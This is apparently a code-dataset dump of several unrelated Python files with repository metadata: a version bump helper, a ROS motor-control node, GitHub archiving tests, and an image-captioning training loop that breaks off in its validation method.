1aa3065d974351df58a5620c78ca80a10a385321
|
[
"MIT"
] | 2
|
2021-05-30T11:52:44.000Z
|
2021-06-29T11:06:31.000Z
|
src/version.py
|
StevenBaby/chess
|
1aa3065d974351df58a5620c78ca80a10a385321
|
[
"MIT"
] | 1
|
2021-06-19T03:41:23.000Z
|
2021-06-19T03:41:23.000Z
|
# coding=utf-8
VERSION = '1.8.1'
__VERSION__ = VERSION
def increase():
import os
import re
filename = os.path.abspath(__file__)
with open(filename, encoding='utf8') as file:
content = file.read()
match = re.search(r"VERSION = '(\d+).(\d+).(\d+)'", content)
old = f'{match.group(1)}.{match.group(2)}.{match.group(3)}'
new = f'{match.group(1)}.{match.group(2)}.{int(match.group(3)) + 1}'
content = content.replace(old, new)
with open(filename, 'w', encoding='utf8') as file:
file.write(content)
| 25.045455
| 72
| 0.598911
|
VERSION = '1.8.1'
__VERSION__ = VERSION
def increase():
import os
import re
filename = os.path.abspath(__file__)
with open(filename, encoding='utf8') as file:
content = file.read()
match = re.search(r"VERSION = '(\d+).(\d+).(\d+)'", content)
old = f'{match.group(1)}.{match.group(2)}.{match.group(3)}'
new = f'{match.group(1)}.{match.group(2)}.{int(match.group(3)) + 1}'
content = content.replace(old, new)
with open(filename, 'w', encoding='utf8') as file:
file.write(content)
| true
| true
|
790c6d832bf56b9e7c35fdae1589b565cce84fd9
| 147
|
py
|
Python
|
src/backend/tests/factories/record_factory.py
|
NickSchimek/recordexpungPDX
|
34ed0f3cb5b7368a935a11306d3143d0d154c2de
|
[
"CNRI-Python",
"RSA-MD",
"Xnet",
"Linux-OpenIB",
"FTL",
"X11"
] | null | null | null |
src/backend/tests/factories/record_factory.py
|
NickSchimek/recordexpungPDX
|
34ed0f3cb5b7368a935a11306d3143d0d154c2de
|
[
"CNRI-Python",
"RSA-MD",
"Xnet",
"Linux-OpenIB",
"FTL",
"X11"
] | 93
|
2019-12-07T01:43:50.000Z
|
2021-08-01T13:30:44.000Z
|
src/backend/tests/factories/record_factory.py
|
NickSchimek/recordexpungPDX
|
34ed0f3cb5b7368a935a11306d3143d0d154c2de
|
[
"CNRI-Python",
"RSA-MD",
"Xnet",
"Linux-OpenIB",
"FTL",
"X11"
] | null | null | null |
from expungeservice.models.record import Record
class RecordFactory:
@staticmethod
def create(cases):
return Record(list(cases))
| 18.375
| 47
| 0.727891
|
from expungeservice.models.record import Record
class RecordFactory:
@staticmethod
def create(cases):
return Record(list(cases))
| true
| true
|
790c6e105d00aa08941205a5c43b27df00b37ef3
| 1,383
|
py
|
Python
|
deprecated/led_control.py
|
isarlab-department-engineering/ros_dt_stop_light_detection
|
32d0e9f0c4a9f80510c450adc87764444e910d31
|
[
"BSD-3-Clause"
] | null | null | null |
deprecated/led_control.py
|
isarlab-department-engineering/ros_dt_stop_light_detection
|
32d0e9f0c4a9f80510c450adc87764444e910d31
|
[
"BSD-3-Clause"
] | null | null | null |
deprecated/led_control.py
|
isarlab-department-engineering/ros_dt_stop_light_detection
|
32d0e9f0c4a9f80510c450adc87764444e910d31
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# this node will be implemented on the master node
# this is a test script for drive motor
# in function of stop and front lights detection
# this script will be implemented in another node
# import libraries
import rospy,sys,time,atexit,numpy
from std_msgs.msg import String,Int16MultiArray
# define variables
avoidingVehicle = False
array = Int16MultiArray()
array.data = []
controlPub = rospy.Publisher("cmd",Int16MultiArray,queue_size=1)
def turnOffMotors():
array.data = [0,0,0,0]
controlPub.publish(array)
def setSpeed(motor1,motor2):
if motor1 == 0 and motor2 == 0:
turnOffMotors()
else:
array.data = [motor1,motor2,0,0]
controlPub.publish(array)
def avoidVehicle():
global avoidingVehicle
turnOffMotors()
avoidingVehicle = False
def callback(data):
global avoidingVehicle
rospy.loginfo(rospy.get_caller_id() +" Led control String received: %s",data.data)
if data.data == "stop" :
turnOffMotors()
elif (data.data == "front" and avoidingVehicle == False):
avoidingVehicle = True
avoidVehicle()
elif data.data == "w":
setSpeed(150,150)
elif data.data == "s":
turnOffMotors()
def led_control():
rospy.init_node('led_control',anonymous=True)
rospy.Subscriber('led_control_topic',String,callback)
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
if __name__ == '__main__':
led_control()
| 23.844828
| 83
| 0.737527
|
import rospy,sys,time,atexit,numpy
from std_msgs.msg import String,Int16MultiArray
avoidingVehicle = False
array = Int16MultiArray()
array.data = []
controlPub = rospy.Publisher("cmd",Int16MultiArray,queue_size=1)
def turnOffMotors():
array.data = [0,0,0,0]
controlPub.publish(array)
def setSpeed(motor1,motor2):
if motor1 == 0 and motor2 == 0:
turnOffMotors()
else:
array.data = [motor1,motor2,0,0]
controlPub.publish(array)
def avoidVehicle():
global avoidingVehicle
turnOffMotors()
avoidingVehicle = False
def callback(data):
global avoidingVehicle
rospy.loginfo(rospy.get_caller_id() +" Led control String received: %s",data.data)
if data.data == "stop" :
turnOffMotors()
elif (data.data == "front" and avoidingVehicle == False):
avoidingVehicle = True
avoidVehicle()
elif data.data == "w":
setSpeed(150,150)
elif data.data == "s":
turnOffMotors()
def led_control():
rospy.init_node('led_control',anonymous=True)
rospy.Subscriber('led_control_topic',String,callback)
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
if __name__ == '__main__':
led_control()
| true
| true
|
790c6e1bd0f1dc5b21d694dc4c0d511cdb5ede6d
| 415
|
py
|
Python
|
videomaker/functions/savePreset.py
|
TheTimebike/VideoMaker-Studio
|
289fd3b9f3c27d298ee94b1e79415a20ec084c4c
|
[
"MIT"
] | 4
|
2019-03-03T12:10:20.000Z
|
2021-09-05T12:30:25.000Z
|
videomaker/functions/savePreset.py
|
TheTimebike/VideoMaker-Studio
|
289fd3b9f3c27d298ee94b1e79415a20ec084c4c
|
[
"MIT"
] | null | null | null |
videomaker/functions/savePreset.py
|
TheTimebike/VideoMaker-Studio
|
289fd3b9f3c27d298ee94b1e79415a20ec084c4c
|
[
"MIT"
] | 2
|
2019-03-27T23:40:34.000Z
|
2019-10-07T11:09:32.000Z
|
import json
from videomaker.functions.packageData import packageData
from videomaker.functions.addPreset import addOption
def savePreset(focus):
preset = packageData(focus, verify=False)
with open("./presets/{0}.json".format(preset["subredditName"]), "w+") as out:
json.dump(preset, out, indent=4)
addOption(focus, "./presets/{0}.json".format(preset["subredditName"]), preset["subredditName"])
| 41.5
| 99
| 0.73253
|
import json
from videomaker.functions.packageData import packageData
from videomaker.functions.addPreset import addOption
def savePreset(focus):
preset = packageData(focus, verify=False)
with open("./presets/{0}.json".format(preset["subredditName"]), "w+") as out:
json.dump(preset, out, indent=4)
addOption(focus, "./presets/{0}.json".format(preset["subredditName"]), preset["subredditName"])
| true
| true
|
790c7007d3b665975df26aa73591e924e9115794
| 6,815
|
py
|
Python
|
github_archive/test/test_get_github.py
|
hellkite500/github_scrape
|
e9d3b10b434349e08a92ef97e8414c8b9f0c7584
|
[
"CC0-1.0"
] | null | null | null |
github_archive/test/test_get_github.py
|
hellkite500/github_scrape
|
e9d3b10b434349e08a92ef97e8414c8b9f0c7584
|
[
"CC0-1.0"
] | null | null | null |
github_archive/test/test_get_github.py
|
hellkite500/github_scrape
|
e9d3b10b434349e08a92ef97e8414c8b9f0c7584
|
[
"CC0-1.0"
] | null | null | null |
import unittest
from typing import Optional
from pathlib import Path
from time import strftime, gmtime
from github import Github
import json
import yaml
from .. import get_repo_meta, clone_and_archive
from ..get_github import dump_list
from pathlib import Path
class TestGetGithub(unittest.TestCase):
"""
Test coverage for the get_github module
"""
_current_dir = Path(__file__).resolve().parent
#BORROWED from https://github.com/NOAA-OWP/DMOD/blob/master/python/lib/scheduler/dmod/test/it_redisManager.py
@classmethod
def find_project_root_directory(cls, current_directory: Optional[Path]) -> Optional[Path]:
"""
Given a directory (with ``None`` implying the current directory) assumed to be at or under this project's root,
find the project root directory.
This implementation attempts to find a directory having both a ``.git/`` child directory and a ``.env`` file.
Parameters
----------
current_directory
Returns
-------
Optional[Path]
The project root directory, or ``None`` if it fails to find it.
"""
if not current_directory:
current_directory = TestGetGithub._current_dir
abs_root = Path(current_directory.absolute().root)
while current_directory.absolute() != abs_root:
if not current_directory.is_dir():
current_directory = current_directory.parent
continue
git_sub_dir = current_directory.joinpath('.git')
child_env_file = current_directory.joinpath('config.yaml')
if git_sub_dir.exists() and git_sub_dir.is_dir() and child_env_file.exists() and child_env_file.is_file():
return current_directory
current_directory = current_directory.parent
return None
@classmethod
def load_token(cls):
"""
Read an API token from a configuration file, if none found, use '' for no auth
"""
token = ''
root_dir = cls.find_project_root_directory(None)
if not root_dir:
return token
config_file = root_dir/'config.yaml'
if config_file.exists():
with open(config_file) as file:
config = yaml.load(file, Loader=yaml.FullLoader)
try:
token = config['token']
except:
print("Unable to load api-token from project root directory config.yaml")
return token
def setUp(self):
self.token = self.load_token()
if self.token:
#Token auth github, higher rate limit
self.github = Github(self.token)
else:
#Anonimous github, severly rate limited API
self.github = Github()
self.org_string = 'NOAA-OWP'
self.repo_string = 'owp-open-source-project-template'
self.repo_w_wiki = 'DMOD'
self.org = self.github.get_organization(self.org_string)
self.wiki_repo = self.org.get_repo(self.repo_w_wiki)
self.repo = self.org.get_repo(self.repo_string)
self.time = strftime("%Y-%m-%d_%H:%M:%S", gmtime())
def tearDown(self):
for p in Path(TestGetGithub._current_dir).glob("*.json"):
if p.is_file():
p.unlink()
for p in Path(TestGetGithub._current_dir).glob("*.tar.gz"):
if p.is_file():
p.unlink()
def test_get_repo_meta(self):
"""
Test the archive_repo function to ensure all meta data is properly captured
"""
meta = get_repo_meta(self.repo, self.time, TestGetGithub._current_dir)
self.assertIsNotNone(meta)
self.assertTrue(len(meta), 6)
#defer name substitution
pattern = "{repo}_{name}_{time}.json".format(repo=self.repo_string, name="{name}", time=self.time)
self.assertEqual(meta[0].name, pattern.format(name='comments'))
self.assertEqual(meta[1].name, pattern.format(name='issues'))
self.assertEqual(meta[2].name, pattern.format(name='issue_comments'))
self.assertEqual(meta[3].name, pattern.format(name='pulls'))
self.assertEqual(meta[4].name, pattern.format(name='pulls_comments'))
self.assertEqual(meta[5].name, pattern.format(name='pulls_review_comments'))
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issues')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issue_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_review_comments')).exists())
def test_clone_and_archive(self):
"""
Test the clone functionality
"""
#Sorta hackily testing the archive_repo logic here...FIXME later
#FIXME has_wiki is broke!!!
self.assertFalse(self.repo.has_wiki)
clone_url = self.repo.clone_url
archive_name = clone_and_archive(self.repo_string, clone_url, self.time, TestGetGithub._current_dir, [])
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_string, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
#TODO test existence of repo in archive
def test_clone_and_archive_1(self):
"""
Test cloning a repo with a wiki
"""
#Sorta hackily testing the archive_repo logic here...FIXME later
self.assertTrue(self.wiki_repo.has_wiki)
wiki_url = self.wiki_repo.clone_url[:-3]+'wiki.git'
#finally get the repo code itself
clone_url = self.wiki_repo.clone_url
archive_name = clone_and_archive(self.repo_w_wiki, clone_url, self.time, TestGetGithub._current_dir, [], wiki_url)
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_w_wiki, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
#TODO test existense of wiki in archive
@unittest.skip("Incomplete mock implementation for dumped item")
def test_dump_list(self):
pass
#Quick json format test for list objects
outfile = dump_list("test_repo", self.time, TestGetGithub._current_dir, "test_key", [ '{json=dict, test=values}', 'json=dict2, test=values2}'])
with open(outfile) as fp:
data = json.load(fp)
self.assertTrue(data['json'], 'dict')
| 44.253247
| 151
| 0.650624
|
import unittest
from typing import Optional
from pathlib import Path
from time import strftime, gmtime
from github import Github
import json
import yaml
from .. import get_repo_meta, clone_and_archive
from ..get_github import dump_list
from pathlib import Path
class TestGetGithub(unittest.TestCase):
_current_dir = Path(__file__).resolve().parent
@classmethod
def find_project_root_directory(cls, current_directory: Optional[Path]) -> Optional[Path]:
if not current_directory:
current_directory = TestGetGithub._current_dir
abs_root = Path(current_directory.absolute().root)
while current_directory.absolute() != abs_root:
if not current_directory.is_dir():
current_directory = current_directory.parent
continue
git_sub_dir = current_directory.joinpath('.git')
child_env_file = current_directory.joinpath('config.yaml')
if git_sub_dir.exists() and git_sub_dir.is_dir() and child_env_file.exists() and child_env_file.is_file():
return current_directory
current_directory = current_directory.parent
return None
@classmethod
def load_token(cls):
token = ''
root_dir = cls.find_project_root_directory(None)
if not root_dir:
return token
config_file = root_dir/'config.yaml'
if config_file.exists():
with open(config_file) as file:
config = yaml.load(file, Loader=yaml.FullLoader)
try:
token = config['token']
except:
print("Unable to load api-token from project root directory config.yaml")
return token
def setUp(self):
self.token = self.load_token()
if self.token:
self.github = Github(self.token)
else:
self.github = Github()
self.org_string = 'NOAA-OWP'
self.repo_string = 'owp-open-source-project-template'
self.repo_w_wiki = 'DMOD'
self.org = self.github.get_organization(self.org_string)
self.wiki_repo = self.org.get_repo(self.repo_w_wiki)
self.repo = self.org.get_repo(self.repo_string)
self.time = strftime("%Y-%m-%d_%H:%M:%S", gmtime())
def tearDown(self):
for p in Path(TestGetGithub._current_dir).glob("*.json"):
if p.is_file():
p.unlink()
for p in Path(TestGetGithub._current_dir).glob("*.tar.gz"):
if p.is_file():
p.unlink()
def test_get_repo_meta(self):
meta = get_repo_meta(self.repo, self.time, TestGetGithub._current_dir)
self.assertIsNotNone(meta)
self.assertTrue(len(meta), 6)
pattern = "{repo}_{name}_{time}.json".format(repo=self.repo_string, name="{name}", time=self.time)
self.assertEqual(meta[0].name, pattern.format(name='comments'))
self.assertEqual(meta[1].name, pattern.format(name='issues'))
self.assertEqual(meta[2].name, pattern.format(name='issue_comments'))
self.assertEqual(meta[3].name, pattern.format(name='pulls'))
self.assertEqual(meta[4].name, pattern.format(name='pulls_comments'))
self.assertEqual(meta[5].name, pattern.format(name='pulls_review_comments'))
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issues')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issue_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_review_comments')).exists())
def test_clone_and_archive(self):
self.assertFalse(self.repo.has_wiki)
clone_url = self.repo.clone_url
archive_name = clone_and_archive(self.repo_string, clone_url, self.time, TestGetGithub._current_dir, [])
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_string, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
def test_clone_and_archive_1(self):
self.assertTrue(self.wiki_repo.has_wiki)
wiki_url = self.wiki_repo.clone_url[:-3]+'wiki.git'
clone_url = self.wiki_repo.clone_url
archive_name = clone_and_archive(self.repo_w_wiki, clone_url, self.time, TestGetGithub._current_dir, [], wiki_url)
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_w_wiki, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
@unittest.skip("Incomplete mock implementation for dumped item")
def test_dump_list(self):
pass
outfile = dump_list("test_repo", self.time, TestGetGithub._current_dir, "test_key", [ '{json=dict, test=values}', 'json=dict2, test=values2}'])
with open(outfile) as fp:
data = json.load(fp)
self.assertTrue(data['json'], 'dict')
| true
| true
|
790c7063d06c1fc8c43a95332b64d7e32dc32159
| 14,307
|
py
|
Python
|
trainer/trainer.py
|
Renovamen/Image-Captioning
|
de8d4f553a22e967fa56a01d5b4a2206b9431771
|
[
"MIT"
] | 5
|
2020-11-03T16:08:18.000Z
|
2022-01-17T03:56:15.000Z
|
trainer/trainer.py
|
Renovamen/Image-Caption
|
de8d4f553a22e967fa56a01d5b4a2206b9431771
|
[
"MIT"
] | null | null | null |
trainer/trainer.py
|
Renovamen/Image-Caption
|
de8d4f553a22e967fa56a01d5b4a2206b9431771
|
[
"MIT"
] | 1
|
2020-11-03T11:29:36.000Z
|
2020-11-03T11:29:36.000Z
|
import time
from typing import Optional, Dict
import torch
from torch import nn, optim
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pack_padded_sequence
from utils import TensorboardWriter, AverageMeter, save_checkpoint, accuracy, \
clip_gradient, adjust_learning_rate
from metrics import Metrics
class Trainer:
"""
Encoder-decoder pipeline. Tearcher Forcing is used during training and validation.
Parameters
----------
caption_model : str
Type of the caption model
epochs : int
We should train the model for __ epochs
device : torch.device
Use GPU or not
word_map : Dict[str, int]
Word2id map
rev_word_map : Dict[int, str]
Id2word map
start_epoch : int
We should start training the model from __th epoch
epochs_since_improvement : int
Number of epochs since last improvement in BLEU-4 score
best_bleu4 : float
Best BLEU-4 score until now
train_loader : DataLoader
DataLoader for training data
val_loader : DataLoader
DataLoader for validation data
encoder : nn.Module
Encoder (based on CNN)
decoder : nn.Module
Decoder (based on LSTM)
encoder_optimizer : optim.Optimizer
Optimizer for encoder (Adam) (if fine-tune)
decoder_optimizer : optim.Optimizer
Optimizer for decoder (Adam)
loss_function : nn.Module
Loss function (cross entropy)
grad_clip : float
Gradient threshold in clip gradients
tau : float
Penalty term τ for doubly stochastic attention in paper: show, attend and tell
fine_tune_encoder : bool
Fine-tune encoder or not
tensorboard : bool, optional, default=False
Enable tensorboard or not?
log_dir : str, optional
Path to the folder to save logs for tensorboard
"""
def __init__(
self,
caption_model: str,
epochs: int,
device: torch.device,
word_map: Dict[str, int],
rev_word_map: Dict[int, str],
start_epoch: int,
epochs_since_improvement: int,
best_bleu4: float,
train_loader: DataLoader,
val_loader: DataLoader,
encoder: nn.Module,
decoder: nn.Module,
encoder_optimizer: optim.Optimizer,
decoder_optimizer: optim.Optimizer,
loss_function: nn.Module,
grad_clip: float,
tau: float,
fine_tune_encoder: bool,
tensorboard: bool = False,
log_dir: Optional[str] = None
) -> None:
self.device = device # GPU / CPU
self.caption_model = caption_model
self.epochs = epochs
self.word_map = word_map
self.rev_word_map = rev_word_map
self.start_epoch = start_epoch
self.epochs_since_improvement = epochs_since_improvement
self.best_bleu4 = best_bleu4
self.train_loader = train_loader
self.val_loader = val_loader
self.encoder = encoder
self.decoder = decoder
self.encoder_optimizer = encoder_optimizer
self.decoder_optimizer = decoder_optimizer
self.loss_function = loss_function
self.tau = tau
self.grad_clip = grad_clip
self.fine_tune_encoder = fine_tune_encoder
self.print_freq = 100 # print training/validation stats every __ batches
# setup visualization writer instance
self.writer = TensorboardWriter(log_dir, tensorboard)
self.len_epoch = len(self.train_loader)
def train(self, epoch: int) -> None:
"""
Train an epoch
Parameters
----------
epoch : int
Current number of epoch
"""
self.decoder.train() # train mode (dropout and batchnorm is used)
self.encoder.train()
batch_time = AverageMeter() # forward prop. + back prop. time
data_time = AverageMeter() # data loading time
losses = AverageMeter(tag='loss', writer=self.writer) # loss (per word decoded)
top5accs = AverageMeter(tag='top5acc', writer=self.writer) # top5 accuracy
start = time.time()
# batches
for i, (imgs, caps, caplens) in enumerate(self.train_loader):
data_time.update(time.time() - start)
# Move to GPU, if available
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
# forward encoder
imgs = self.encoder(imgs)
# forward decoder
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
# since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores = pack_padded_sequence(scores, decode_lengths, batch_first=True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first=True)[0]
# calc loss
loss = self.loss_function(scores, targets)
# doubly stochastic attention regularization (in paper: show, attend and tell)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
# clear gradient of last batch
self.decoder_optimizer.zero_grad()
if self.encoder_optimizer is not None:
self.encoder_optimizer.zero_grad()
# backward
loss.backward()
# clip gradients
if self.grad_clip is not None:
clip_gradient(self.decoder_optimizer, self.grad_clip)
if self.encoder_optimizer is not None:
clip_gradient(self.encoder_optimizer, self.grad_clip)
# update weights
self.decoder_optimizer.step()
if self.encoder_optimizer is not None:
self.encoder_optimizer.step()
# set step for tensorboard
step = (epoch - 1) * self.len_epoch + i
self.writer.set_step(step=step, mode='train')
# keep track of metrics
top5 = accuracy(scores, targets, 5)
losses.update(loss.item(), sum(decode_lengths))
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
# print status
if i % self.print_freq == 0:
print(
'Epoch: [{0}][{1}/{2}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data Load Time {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i, len(self.train_loader),
batch_time = batch_time,
data_time = data_time,
loss = losses,
top5 = top5accs
)
)
def validate(self) -> float:
"""
Validate an epoch.
Returns
-------
bleu4 : float
BLEU-4 score
"""
self.decoder.eval() # eval mode (no dropout or batchnorm)
if self.encoder is not None:
self.encoder.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top5accs = AverageMeter()
start = time.time()
ground_truth = list() # ground_truth (true captions) for calculating BLEU-4 score
prediction = list() # prediction (predicted captions)
# explicitly disable gradient calculation to avoid CUDA memory error
# solves the issue #57
with torch.no_grad():
# Batches
for i, (imgs, caps, caplens, allcaps) in enumerate(self.val_loader):
# move to device, if available
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
# forward encoder
if self.encoder is not None:
imgs = self.encoder(imgs)
# forward decoder
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
# since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores_copy = scores.clone()
scores = pack_padded_sequence(scores, decode_lengths, batch_first = True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first = True)[0]
# calc loss
loss = self.loss_function(scores, targets)
# doubly stochastic attention regularization (in paper: show, attend and tell)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
# keep track of metrics
losses.update(loss.item(), sum(decode_lengths))
top5 = accuracy(scores, targets, 5)
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
if i % self.print_freq == 0:
print('Validation: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})\t'.format(i, len(self.val_loader),
batch_time = batch_time,
loss = losses,
top5 = top5accs)
)
# store ground truth captions and predicted captions of each image
# for n images, each of them has one prediction and multiple ground truths (a, b, c...):
# prediction = [ [hyp1], [hyp2], ..., [hypn] ]
# ground_truth = [ [ [ref1a], [ref1b], [ref1c] ], ..., [ [refna], [refnb] ] ]
# ground truth
allcaps = allcaps[sort_ind] # because images were sorted in the decoder
for j in range(allcaps.shape[0]):
img_caps = allcaps[j].tolist()
img_captions = list(
map(
lambda c: [w for w in c if w not in {self.word_map['<start>'], self.word_map['<pad>']}],
img_caps
)
) # remove <start> and pads
ground_truth.append(img_captions)
# prediction
_, preds = torch.max(scores_copy, dim = 2)
preds = preds.tolist()
temp_preds = list()
for j, p in enumerate(preds):
temp_preds.append(preds[j][:decode_lengths[j]]) # remove pads
preds = temp_preds
prediction.extend(preds)
assert len(ground_truth) == len(prediction)
# calc BLEU-4 and CIDEr score
metrics = Metrics(ground_truth, prediction, self.rev_word_map)
bleu4 = metrics.belu[3] # BLEU-4
cider = metrics.cider # CIDEr
print(
'\n * LOSS - {loss.avg:.3f}, TOP-5 ACCURACY - {top5.avg:.3f}, BLEU-4 - {bleu}, CIDEr - {cider}\n'.format(
loss = losses,
top5 = top5accs,
bleu = bleu4,
cider = cider
)
)
return bleu4
def run_train(self) -> None:
# epochs
for epoch in range(self.start_epoch, self.epochs):
# decay learning rate if there is no improvement for 8 consecutive epochs
# terminate training if there is no improvement for 20 consecutive epochs
if self.epochs_since_improvement == 20:
break
if self.epochs_since_improvement > 0 and self.epochs_since_improvement % 8 == 0:
adjust_learning_rate(self.decoder_optimizer, 0.8)
if self.fine_tune_encoder:
adjust_learning_rate(self.encoder_optimizer, 0.8)
# train an epoch
self.train(epoch = epoch)
# validate an epoch
recent_bleu4 = self.validate()
# epochs num since last improvement
is_best = recent_bleu4 > self.best_bleu4
self.best_bleu4 = max(recent_bleu4, self.best_bleu4)
if not is_best:
self.epochs_since_improvement += 1
print("\nEpochs since last improvement: %d\n" % (self.epochs_since_improvement,))
else:
self.epochs_since_improvement = 0
# save checkpoint
save_checkpoint(
epoch = epoch,
epochs_since_improvement = self.epochs_since_improvement,
encoder = self.encoder,
decoder = self.decoder,
encoder_optimizer = self.encoder_optimizer,
decoder_optimizer = self.decoder_optimizer,
caption_model = self.caption_model,
bleu4 = recent_bleu4,
is_best = is_best
)
| 36.77892
| 121
| 0.551618
|
import time
from typing import Optional, Dict
import torch
from torch import nn, optim
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pack_padded_sequence
from utils import TensorboardWriter, AverageMeter, save_checkpoint, accuracy, \
clip_gradient, adjust_learning_rate
from metrics import Metrics
class Trainer:
def __init__(
self,
caption_model: str,
epochs: int,
device: torch.device,
word_map: Dict[str, int],
rev_word_map: Dict[int, str],
start_epoch: int,
epochs_since_improvement: int,
best_bleu4: float,
train_loader: DataLoader,
val_loader: DataLoader,
encoder: nn.Module,
decoder: nn.Module,
encoder_optimizer: optim.Optimizer,
decoder_optimizer: optim.Optimizer,
loss_function: nn.Module,
grad_clip: float,
tau: float,
fine_tune_encoder: bool,
tensorboard: bool = False,
log_dir: Optional[str] = None
) -> None:
self.device = device
self.caption_model = caption_model
self.epochs = epochs
self.word_map = word_map
self.rev_word_map = rev_word_map
self.start_epoch = start_epoch
self.epochs_since_improvement = epochs_since_improvement
self.best_bleu4 = best_bleu4
self.train_loader = train_loader
self.val_loader = val_loader
self.encoder = encoder
self.decoder = decoder
self.encoder_optimizer = encoder_optimizer
self.decoder_optimizer = decoder_optimizer
self.loss_function = loss_function
self.tau = tau
self.grad_clip = grad_clip
self.fine_tune_encoder = fine_tune_encoder
self.print_freq = 100
self.writer = TensorboardWriter(log_dir, tensorboard)
self.len_epoch = len(self.train_loader)
def train(self, epoch: int) -> None:
self.decoder.train()
self.encoder.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter(tag='loss', writer=self.writer)
top5accs = AverageMeter(tag='top5acc', writer=self.writer)
start = time.time()
for i, (imgs, caps, caplens) in enumerate(self.train_loader):
data_time.update(time.time() - start)
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
imgs = self.encoder(imgs)
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
targets = caps_sorted[:, 1:]
# pack_padded_sequence is an easy trick to do this
scores = pack_padded_sequence(scores, decode_lengths, batch_first=True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first=True)[0]
# calc loss
loss = self.loss_function(scores, targets)
# doubly stochastic attention regularization (in paper: show, attend and tell)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
# clear gradient of last batch
self.decoder_optimizer.zero_grad()
if self.encoder_optimizer is not None:
self.encoder_optimizer.zero_grad()
# backward
loss.backward()
# clip gradients
if self.grad_clip is not None:
clip_gradient(self.decoder_optimizer, self.grad_clip)
if self.encoder_optimizer is not None:
clip_gradient(self.encoder_optimizer, self.grad_clip)
# update weights
self.decoder_optimizer.step()
if self.encoder_optimizer is not None:
self.encoder_optimizer.step()
# set step for tensorboard
step = (epoch - 1) * self.len_epoch + i
self.writer.set_step(step=step, mode='train')
# keep track of metrics
top5 = accuracy(scores, targets, 5)
losses.update(loss.item(), sum(decode_lengths))
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
# print status
if i % self.print_freq == 0:
print(
'Epoch: [{0}][{1}/{2}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data Load Time {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i, len(self.train_loader),
batch_time = batch_time,
data_time = data_time,
loss = losses,
top5 = top5accs
)
)
def validate(self) -> float:
self.decoder.eval() # eval mode (no dropout or batchnorm)
